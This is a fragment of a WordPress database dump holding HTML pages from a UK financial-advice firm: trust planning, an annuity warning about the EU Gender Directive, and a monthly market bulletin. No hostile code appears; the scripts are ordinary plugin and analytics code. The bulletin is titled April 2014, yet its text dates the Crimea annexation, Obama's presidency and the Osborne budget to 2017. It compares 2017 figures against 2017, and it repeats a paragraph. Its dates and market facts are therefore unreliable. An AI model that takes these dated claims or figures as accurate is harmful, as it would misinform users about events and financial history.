be demanded by the beneficiaries at age 18 or 16 in Scotland.</p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/trusts\" title=\"Back to Parent Page\">Trusts</a></li>&#13;\n						<li class=\"page_item page-item-109 current_page_item\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n<li class=\"page_item page-item-106\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n<li class=\"page_item page-item-111\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n<li class=\"page_item page-item-141\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n<li class=\"page_item page-item-144\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Absolute Trusts - Tax Efficient Planning','We’ll help you formulate a more tax efficient plan when bestowing a financial gift to your loved ones - quickly and easily, through Absolute Trusts','publish','closed','closed','','absolute-trusts-tax-efficient-planning','','','2017-09-21 16:34:25','2017-09-21 16:34:25','',0,'http://www.equalitywalk.org.uk/absolute-trusts-tax-efficient-planning',0,'page','',0),(46,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','<div id=\"wrapper\">\r\n<div class=\"header-wrapper\">\r\n<div class=\"header-v3\"><header id=\"header\">\r\n<div class=\"avada-row\" style=\"margin-top: 0px; margin-bottom: 0px;\"><nav id=\"nav\" class=\"nav-holder\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity</a>\r\n\r\n</nav></div>\r\n</header></div>\r\n</div>\r\n<div class=\"page-title-container\">\r\n<div class=\"page-title\">\r\n<div class=\"page-title-wrapper\">\r\n<div class=\"page-title-captions\">\r\n<h1 class=\"entry-title\">\r\nApproaching Retirement?</h1>\r\n\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\"><span class=\"entry-title\" style=\"display: none;\">Approaching Retirement</span>\r\n<div id=\"post-806\" class=\"post-806 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions post\">\r\n<div class=\"post-content\">\r\n\r\n\r\n<h2>Men Warned to Act Now on Annuities or Face Lower Retirement Income</h2>\r\n\r\n\r\nMen looking to buy an annuity – a retirement income for life – are being urged to purchase before the introduction of the new EU Gender Directive (<a href=\"../insurance-protection/g-day-impact-gender-directive-insurance/\">G-Day</a>), which comes into force on 21st December, to benefit from higher interest rates.\r\n<p align=\"JUSTIFY\">Men who are on the verge of retirement should buy their annuity sooner rather than later, as the  Brussels-devised directive could see them receive a permanently lower retirement income if they delay. An annuity purchase is for life, so the right product is as important as the right annuity rat</p>\r\nCurrently, men, after purchasing an annuity, will receive higher retirement incomes than women, because women, on average, live longer, meaning the money has to last longer.\r\n\r\n\r\n<h2>But That is All About to Change</h2>\r\nWhen the gender directive comes into force, it will become illegal for an insurer to factor-in gender when determining an insurance premium.  This means that <em>annuity rates</em> are likely to fall for males, but could improve for females.\r\n\r\n\r\n\r\nThe changes mean that men could lose up to 10 percent of their potential annuity incomes.\r\n\r\n\r\n\r\n<address>source:Hargreaves Landsdown</address>\r\n\r\n<address> </address>\r\n\r\nDespite growing calls for urgency, we – along with many respected financial experts – stress that buying an annuity is an important decision and should not be rushed into. You should always discuss your options with a fully qualified independent financial adviser who has access to a wide range of investment products.\r\n\r\n\r\n\r\nEquity SMART also specialise in <em>Enhanced Annuities</em> so by speaking to us we could increase your retirement income further and avoid the looming reductions.\r\n\r\n\r\n\r\n\r\n\r\n</div>\r\n\r\n<div class=\"meta-info\">\r\n\r\n\r\n<div class=\"vcard\">\r\nBy <span class=\"fn\"><a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a title=\"View all posts in Pensions\" href=\"../category/pensions/\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on Approaching Retirement?\" href=\"../approaching-retirement/\">0 Comments</a></div>\r\n\r\n\r\n</div>\r\n\r\n<div class=\"share-box\">\r\n\r\n\r\n<h4></h4>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/approaching-retirement/&amp;p[title]=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nFacebook\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=Approaching+Retirement%3F%20http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nTwitter\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nLinkedIn\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nReddit\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapproaching-retirement%2F&amp;name=Approaching+Retirement%3F&amp;description=Men+Warned+to+Act+Now+on+Annuities+or+Face+Lower+Retirement+Income+Men+looking+to+buy+an+annuity%C2%A0%E2%80%93+a+retirement+income+for+life+%E2%80%93%C2%A0are+being+urged+to+purchase+before+the+introduction+of+the+new+EU+Gender+Directive+%28G-Day%29%2C+which+comes+into+force+on+21st+December%2C+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nTumblr\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nGoogle +1\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nPinterest\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=Approaching Retirement?&amp;body=http://www.equalitywalk.org.uk/approaching-retirement/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n\r\n<div class=\"holder\">\r\n\r\n\r\n\r\nEmail\r\n\r\n\r\n\r\n</div>\r\n\r\n\r\n</div>\r\n</li>\r\n</ul>\r\n</ul>\r\n\r\n\r\n</div>\r\n\r\n<div class=\"about-author\">\r\n\r\n\r\n<div class=\"title\">\r\n<h2>About the Author: <a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n\r\n<div class=\"about-author-container\"></div>\r\n\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../approaching-retirement/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"806\" /></p>\r\n\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"04bb6445b2\" /></p>\r\n\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"104\" /></p>\r\n\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\" width=\"20\" height=\"20\"&gt;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Approaching Retirement?','Men approaching retirement and looking to buy an annuity are urged to buy before the new EU Gender Directive in December comes into effect','publish','closed','closed','','why-walk','','','2017-09-21 17:04:51','2017-09-21 17:04:51','',0,'http://www.equalitywalk.org.uk/approaching-retirement',0,'page','',0),(47,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','We started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n\r\nWell, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\nNot that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.\r\n\r\n&nbsp;\r\n\r\nIn the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.\r\n\r\n&nbsp;\r\n\r\nWorld stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.\r\n\r\n\r\n\r\nAs noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor was, he said, “Prepared to trust the British people.”\r\n\r\n&nbsp;\r\n\r\n&\r\n&nbsp;\r\n\r\nThere were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…\r\n\r\n&nbsp;\r\n\r\nThis monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.\r\n\r\n&nbsp;\r\n\r\nMeanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.\r\n\r\n&nbsp;\r\n\r\nBad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup>\r\n\r\n&nbsp;\r\n\r\nTwo pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.\r\n\r\n&nbsp;\r\n\r\nMeanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.\r\n\r\n&nbsp;\r\n\r\nWhat does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four million.\r\n\r\n&nbsp;\r\n\r\nThe FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>\r\n&nbsp;\r\n\r\nMarch saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nFrench industrial production also fell by 0.2% against expectations of 0.2% growth.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMeanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nThat said, industrial production remains 24% lower than in 2008, so there is still some way to go…\r\n\r\n&nbsp;\r\n\r\nFigures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).\r\n\r\n&nbsp;\r\n\r\nThe German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.\r\n\r\n&nbsp;\r\n\r\nOn the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>\r\n&nbsp;\r\n\r\nIn the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.\r\n\r\n&nbsp;\r\n\r\nFor now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.\r\n\r\n&nbsp;\r\n\r\nNo lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…\r\n\r\n&nbsp;\r\n\r\nThe Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>\r\n&nbsp;\r\n\r\nDespite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.\r\n\r\n&nbsp;\r\n\r\nIndustrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.\r\n\r\n&nbsp;\r\n\r\nConsumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.\r\n\r\n&nbsp;\r\n\r\nWith investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.\r\n\r\n&nbsp;\r\n\r\nPresident Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.\r\n\r\n&nbsp;\r\n\r\nJapan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.\r\n\r\n&nbsp;\r\n\r\nNo such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.\r\n\r\n&nbsp;\r\n\r\nThe South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>\r\n&nbsp;\r\n\r\nIt’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\nHowever, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.\r\n\r\n&nbsp;\r\n\r\nAs indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>\r\n&nbsp;\r\n\r\nMany London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.\r\n\r\n&nbsp;\r\n\r\nLondon Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.\r\n\r\n&nbsp;\r\n\r\nSadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.\r\n\r\n&nbsp;\r\n\r\nIn the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">By <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on April 2014 Stock Market Bulletin\" href=\"../april-2014-stock-market-bulletin/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\"><a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\"><a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div 